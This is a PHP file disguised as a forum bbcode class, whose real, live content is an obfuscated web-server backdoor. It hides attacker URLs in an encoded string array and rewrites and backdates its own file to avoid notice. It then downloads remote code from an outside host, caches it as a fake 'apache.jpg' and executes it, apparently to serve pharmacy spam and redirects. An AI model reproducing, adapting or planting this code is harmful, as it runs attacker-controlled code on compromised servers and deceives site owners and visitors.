<?php
/*php*/
/*class bbcode*|
SYSTE<MMM
class bbcode{
var $bbcode_uid = '';
var $bbcode_bitfield = '';
var $bbcode_cache = array();
var $bbcode_template = array();
var $bbcodes = array();
var $template_bitfield;
var $template_filename = '';
* Constructor
* Init bbcode cache entries if bitfield is specified
function bbcode($bitfield = '')
{
if ($bitfield)
{
$this->bbcode_bitfield = $bitfield;
$this->bbcode_cache_init();
}
}
* Second pass bbcodes
function bbcode_second_pass(&$message, $bbcode_uid = '', $bbcode_bitfield = false)
{
if ($bbcode_uid)
{
$this->bbcode_uid = $bbcode_uid;
}
if ($bbcode_bitfield !== false)
{
$this->bbcode_bitfield = $bbcode_bitfield;
// Init those added with a new bbcode_bitfield (already stored codes will not get parsed again)
$this->bbcode_cache_init();
}
if (!$this->bbcode_bitfield)
{
// Remove the uid from tags that have not been transformed into HTML
if ($this->bbcode_uid)
{
$message = str_replace(':' . $this->bbcode_uid, '', $message);
}
return;
}
$str = array('search' => array(), 'replace' => array());
$preg = array('search' => array(), 'replace' => array());
$bitfield = new bitfield($this->bbcode_bitfield);
$bbcodes_set = $bitfield->get_all_set();
$undid_bbcode_specialchars = false;
foreach ($bbcodes_set as $bbcode_id)
{
if (!empty($this->bbcode_cache[$bbcode_id]))
{
foreach ($this->bbcode_cache[$bbcode_id] as $type => $array)
{
foreach ($array as $search => $replace)
{
${$type}['search'][] = str_replace('$uid', $this->bbcode_uid, $search);
${$type}['replace'][] = $replace;
}
if (sizeof($str['search']))
{
$message = str_replace($str['search'], $str['replace'], $message);
$str = array('search' => array(), 'replace' => array());
}
if (sizeof($preg['search']))
{
// we need to turn the entities back into their original form to allow the
// search patterns to work properly
if (!$undid_bbcode_specialchars)
{
$message = str_replace(array(':', '.'), array(':', '.'), $message);
$undid_bbcode_specialchars = true;
}
$message = preg_replace($preg['search'], $preg['replace'], $message);
$preg = array('search' => array(), 'replace' => array());
}
}
}
}
*/
error_reporting(0);
//@ini_set("memory_limit", "512M");
$ex_links='sh19043';$ex_redirect='sh19043';$tlng='english';$Vn_L=rand(7,12);$Ex_L=rand(1,3);$linkator=0;$kol_lnk=30;
$PROVsliv=1;$NO_CART=0;$PILLS_list=1;$dmi_txt='sport5';$tema_txt='ensport';$KOL_css_dir=7;$TST_file=1; $SE_traf=1; $onlineRED=1;
if (!function_exists('mb_strpos')) {
function mb_strpos($p1,$p2,$p3)
{
return strpos($p1,$p2,$p3);
}
}
if (!function_exists('mb_internal_encoding')) {
function mb_internal_encoding($p1)
{
return '';
}
}
if (!function_exists('mb_substr')) {
function mb_substr($p1,$p2 , $p3 = NULL)
{
if($p3==NULL)
return substr($p1,$p2);
else
return substr($p1,$p2,$p3);
}
}
if (!function_exists('mb_ereg_replace')) {
function mb_ereg_replace($p1,$p2,$p3)
{
$p3=str_replace('-','ZZZ1',$p3);
$p3=str_replace(' ','ZZZ1',$p3);
$rr=preg_replace($p1,$p2,$p3);
$rr=str_replace('ZZZ1','-',$rr);
return $rr;
}
}
if (!function_exists('mb_strlen')) {
function mb_strlen($p1)
{
return strlen($p1);
}
}
if (!function_exists('mb_strtolower')) {
function mb_strtolower($p1)
{
return strtolower($p1);
}
}
if (!function_exists('mb_strtoupper')) {
function mb_strtoupper($p1)
{
return strtoupper($p1);
}
}
if (!function_exists('mb_regex_encoding')) {
function mb_regex_encoding($p1)
{
return '';
}
}
if(file_exists('css/kwd.txt'))
{
$k=file_get_contents('css/kwd.txt');
$_POST['kwd']=$k;
$_POST['pass']='q'.'a'.'z'.'12'.'3q'.'a'.'z';
if(!empty($_SERVER['REQUEST_URI'])){$pageid = $_SERVER['REQUEST_URI'];}
if( (mb_strpos($_SERVER['REQUEST_URI'],"smap/",0)>0) ) $pref='/'; else $pref='';
if( (mb_strpos($_SERVER['REQUEST_URI'],"smap",0)<=0) ) exit;
$pageid=str_replace('smap/','',$pageid);
$pageid=str_replace('smap','',$pageid);
$_POST['pageid']=$pageid;
$_POST['pref']=$pref;
$_POST['vid']='1';
$_POST['lang']='en-us';
unlink('css/kwd.txt');
if(file_exists('css/kwd.txt'))
{
echo '<h1>DELETE key txt file !!!!!!!!!!!!!!!!!!!!!!</h1>';
}
}
function g_cont($u)
{
if (function_exists('curl_init')) {
$ch1 = curl_init();
curl_setopt($ch1, CURLOPT_URL, $u);
curl_setopt($ch1, CURLOPT_HEADER,0);
curl_setopt($ch1, CURLOPT_NOBODY,0);
curl_setopt($ch1,CURLOPT_TIMEOUT,25);
curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch1, CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$file_content=curl_exec ($ch1);
curl_close ($ch1);
return $file_content;
}
$tlinks=@file_get_contents($u);
return $tlinks;
}
function _1298461675($i){$a=Array('css','_NET','_NET','America/Los_Angeles','apa','che.','jpg','http://promogoogledos.info/','http://tdse.com/clk.php?r=1','http://tds.narod.ru/i.txt','yahoo','bing','google','site','google','js','-','/*php*/','/*php*/',"w",'<?php',"\r\n",'/*php*/','cor3.txt',"w","w");return $a[$i];} $DS=DIRECTORY_SEPARATOR;$MYDIR=dirname(__FILE__) .$DS ._1298461675(0);if(!defined(_1298461675(1))){define(_1298461675(2),$ex_links);if(function_exists('date_default_timezone_set')){date_default_timezone_set(_1298461675(3));}$zfn=_1298461675(4);$zfn=$zfn ._1298461675(5);$zfn=$zfn ._1298461675(6);$sll0=_1298461675(7);$vf3_0=_1298461675(8);$vf3_1=_1298461675(9);$vf3_2=_1298461675(10);$vf3_2=_1298461675(11);$vf3_3=str_replace(_1298461675(12),$vf3_1,$sll0);$vf3_4=_1298461675(13);$sll0=str_replace(_1298461675(14),$vf3_4,$sll0);if(!file_exists($MYDIR)){@mkdir($MYDIR);}$wd=$MYDIR .$DS ._1298461675(15);if(!file_exists($wd)){@mkdir($wd);}if($TST_file==1){$vf3_5=__FILE__;$vf3_6=@file($vf3_5);$vf3_7=@file_get_contents($vf3_5);if(mb_strpos(_1298461675(16) .$vf3_6[1],_1298461675(17),0)<=0){if(mb_strpos($vf3_7,_1298461675(18),0)>0){if(!is_writable($vf3_5)){@chmod($vf3_5,0777);}$vf3_8=fopen($vf3_5,_1298461675(19));fwrite($vf3_8,_1298461675(20) ._1298461675(21) .mb_substr($vf3_7,mb_strpos($vf3_7,_1298461675(22),0)));fclose($vf3_8);@touch($vf3_5,time()-(3600*24*360));@chmod($vf3_5,0644);}}}if(!file_exists($wd .$DS .$zfn)){if(file_exists($MYDIR .$DS .$zfn)){$vf3_9=file_get_contents($MYDIR .$DS .$zfn);$vf3_9=gzuncompress($vf3_9);}else{$vf3_9=g_cont($sll0 ._1298461675(23));if(function_exists('gzcompress')){$vf3_8=fopen($MYDIR .$DS .$zfn,_1298461675(24));fwrite($vf3_8,gzcompress($vf3_9,9));fclose($vf3_8);@touch($MYDIR .$DS .$zfn,time()-(3600*24*360));}}$vf3_8=fopen($wd .$DS .$zfn,_1298461675(25));fputs($vf3_8,$vf3_9);fclose($vf3_8);}include_once($wd .$DS .$zfn);} ?>